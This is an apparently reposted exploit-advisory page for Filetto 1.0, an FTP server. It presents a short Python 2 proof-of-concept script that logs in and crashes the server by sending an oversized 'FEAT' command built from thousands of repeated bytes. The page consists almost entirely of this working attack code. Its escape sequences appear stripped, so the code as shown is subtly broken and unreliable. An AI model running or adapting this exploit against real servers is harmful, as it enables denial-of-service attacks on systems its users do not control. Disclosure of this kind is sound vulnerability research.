Exploit/Advisories

Published on May 22nd, 2020 📆 | 4889 Views ⚑

0

Filetto 1.0 – ‘FEAT’ Denial of Service (PoC)


iSpeech

# Exploit Title: Filetto 1.0 - 'FEAT' Denial of Service (PoC) 
# Date: 2020-05-13
# Found by: Alvaro J. Gene (Socket_0x03)
# Vendor Homepage: http://www.utillyty.eu
# Software Link: https://sourceforge.net/projects/filetto
# Vulnerable Application: Filetto
# Version: 1.0 (last version. Updated: 01/31/2020)
# Server: FTP Server
# Vulnerable Command: FEAT
# Tested on: Windows 7 SP1


====================================================================================================
======================== [ Filetto v1.0 - 'FEAT' Denial of Service (PoC) ] =========================
====================================================================================================


from socket import *

host = "192.168.0.14"
port = 2021
username = "Socket_0x03"
password = "password"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)

s.send("USER %srn" % (username))
print s.recv(1024)

s.send("PASS %srn" % (password))
print s.recv(1024)

buffer = "FEAT "
buffer += "x41x2c" * 11008
buffer += "rn"

s.send(buffer)
print s.recv(1024)

s.close()





Source link

Tagged with:



Comments are closed.






© Torchsec  Privacy Policy Disclaimer  T&C



Back to Top ↑